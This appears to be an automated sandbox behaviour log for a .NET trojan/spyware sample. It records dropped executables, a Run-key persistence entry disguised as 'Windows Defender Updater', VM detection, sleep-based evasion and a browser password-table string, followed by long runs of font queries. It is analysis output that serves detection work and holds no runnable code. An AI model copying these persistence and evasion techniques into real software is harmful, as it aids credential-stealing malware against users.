                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknown | Process created: C:\Users\user\Desktop\5VXh2VBmA0.exe C:\Users\user\Desktop\5VXh2VBmA0.exe
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe | Process created: C:\Users\user\AppData\Local\Temp\Zip.exe "C:\Users\user\AppData\Local\Temp\Zip.exe"
                    Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\update_232309.exe "C:\Users\user\AppData\Local\Temp\update_232309.exe" / start
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_processor
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_processor
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_processor
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe | File created: C:\Users\user\Desktop\Newtonsoft.Json.dll
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe | File created: C:\Users\user\AppData\Local\Temp\Newtonsoft.Json.dll
                    Source: classification engine | Classification label: mal100.troj.spyw.winEXE@5/11@16/3
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe | File read: C:\Users\user\Desktop\desktop.ini
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.539503355.0000000012FD5000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002C27000.00000004.00000800.00020000.00000000.sdmp, 5VXh2VBmA0.exe, 00000000.00000002.527402882.0000000002C33000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: 5VXh2VBmA0.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.69%
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe | Mutant created: \Sessions\1\BaseNamedObjects\update_windows10
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe | File read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exe | File read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exe | File read: C:\Windows\System32\drivers\etc\hosts
                    Source: Window Recorder | Window detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                    Source: 5VXh2VBmA0.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: 5VXh2VBmA0.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: 5VXh2VBmA0.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: System.Windows.Forms.pdb source: 5VXh2VBmA0.exe, 00000000.00000002.543829326.000000001B9A6000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: mscorlib.pdb source: 5VXh2VBmA0.exe, 00000000.00000002.543829326.000000001B9B9000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: rms.pdb source: 5VXh2VBmA0.exe, 00000000.00000002.547892509.000000001E657000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \gom_v_4.0\Zip\Zip\obj\Debug\Zip.pdb source: 5VXh2VBmA0.exe, Zip.exe.0.dr
                    Source: Binary string: c:\Temp\Json\Working\Newtonsoft.Json\Src\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdb source: 5VXh2VBmA0.exe, Newtonsoft.Json.dll0.0.dr, Newtonsoft.Json.dll.0.dr
                    Source: Binary string: \gom_v_4.0\update_windows10\update_windows10\obj\Debug\update_windows10.pdb source: 5VXh2VBmA0.exe
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe | Code function: 0_2_00007FFBAD39761E pushad ; retf 0_2_00007FFBAD39764D
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe | Code function: 0_2_00007FFBAD39764E push eax; retf 0_2_00007FFBAD39765D
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe | Code function: 0_2_00007FFBAD3981DE push eax; ret 0_2_00007FFBAD3981ED
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe | Code function: 0_2_00007FFBAD3981AE pushad ; ret 0_2_00007FFBAD3981DD
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe | Code function: 0_2_00007FFBAD396199 pushad ; ret 0_2_00007FFBAD3961CD
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exe | Code function: 10_2_00007FFBAD39721E pushad ; iretd 10_2_00007FFBAD39724D
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exe | Code function: 10_2_00007FFBAD39724E push eax; iretd 10_2_00007FFBAD39725D
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exe | Code function: 10_2_00007FFBAD3A7313 push ebx; iretd 10_2_00007FFBAD3A731A
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exe | Code function: 11_2_00007FFBAD3A81DE push eax; ret 11_2_00007FFBAD3A81ED
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exe | Code function: 11_2_00007FFBAD3A81AE pushad ; ret 11_2_00007FFBAD3A81DD
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exe | Code function: 11_2_00007FFBAD3A761E pushad ; retf 11_2_00007FFBAD3A764D
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exe | Code function: 11_2_00007FFBAD3A764E push eax; retf 11_2_00007FFBAD3A765D
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exe | Code function: 11_2_00007FFBAD3A4CBA pushad ; iretd 11_2_00007FFBAD3A4CBD
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exe | Code function: 11_2_00007FFBAD3A6199 pushad ; ret 11_2_00007FFBAD3A61CD
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exe | Code function: 12_2_00007FFBAD3681DE push eax; ret 12_2_00007FFBAD3681ED
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exe | Code function: 12_2_00007FFBAD3681AE pushad ; ret 12_2_00007FFBAD3681DD
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exe | Code function: 12_2_00007FFBAD36761E pushad ; retf 12_2_00007FFBAD36764D
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exe | Code function: 12_2_00007FFBAD36764E push eax; retf 12_2_00007FFBAD36765D
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exe | Code function: 12_2_00007FFBAD366199 pushad ; ret 12_2_00007FFBAD3661CD
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe | File created: C:\Users\user\AppData\Local\Temp\Newtonsoft.Json.dll
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe | File created: C:\Users\user\AppData\Local\Temp\Zip.exe
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe | File created: C:\Users\user\Desktop\Newtonsoft.Json.dll
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Windows Defender Updater

                    Hooking and other Techniques for Hiding and Protection

                    Source: c:\users\user\desktop\5vxh2vbma0.exe | File moved: C:\Users\user\AppData\Local\Temp\update_232309.exe
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe TID: 244 Thread sleep time: -2767011611056431s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exe TID: 5764 Thread sleep time: -5534023222112862s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exe TID: 5764 Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exe TID: 4488 Thread sleep time: -17524406870024063s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exe TID: 6068 Thread sleep count: 6029 > 30
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exe TID: 6076 Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exe TID: 324 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exe TID: 3520 Thread sleep time: -2767011611056431s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exe TID: 3520 Thread sleep time: -30000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exe TID: 5996 Thread sleep count: 9483 > 30
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Newtonsoft.Json.dll
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Dropped PE file which has not been started: C:\Users\user\Desktop\Newtonsoft.Json.dll
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Window / User API: threadDelayed 9125
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exe Window / User API: threadDelayed 9398
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exe Window / User API: threadDelayed 6029
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exe Window / User API: threadDelayed 9483
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_processor
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_processor
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_processor
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Local\Temp\update_232309.exe Thread delayed: delay time: 922337203685477
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.547892509.000000001E657000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f50<
                    Source: 5VXh2VBmA0.exe, 00000000.00000002.524251422.0000000000D99000.00000004.00000020.00020000.00000000.sdmp, Zip.exe, 0000000A.00000002.367509411.00000176E46DB000.00000004.00000020.00020000.00000000.sdmp, update_232309.exe, 0000000B.00000002.352143455.0000000001077000.00000004.00000020.00020000.00000000.sdmp, update_232309.exe, 0000000C.00000002.388502206.0000000000F65000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Process token adjusted: Debug
                    Source: C:\Users\user\AppData\Local\Temp\Zip.exe Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Memory allocated: page read and write | page guard
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Process created: C:\Users\user\AppData\Local\Temp\Zip.exe "C:\Users\user\AppData\Local\Temp\Zip.exe"
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Users\user\Desktop\5VXh2VBmA0.exe VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\5VXh2VBmA0.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
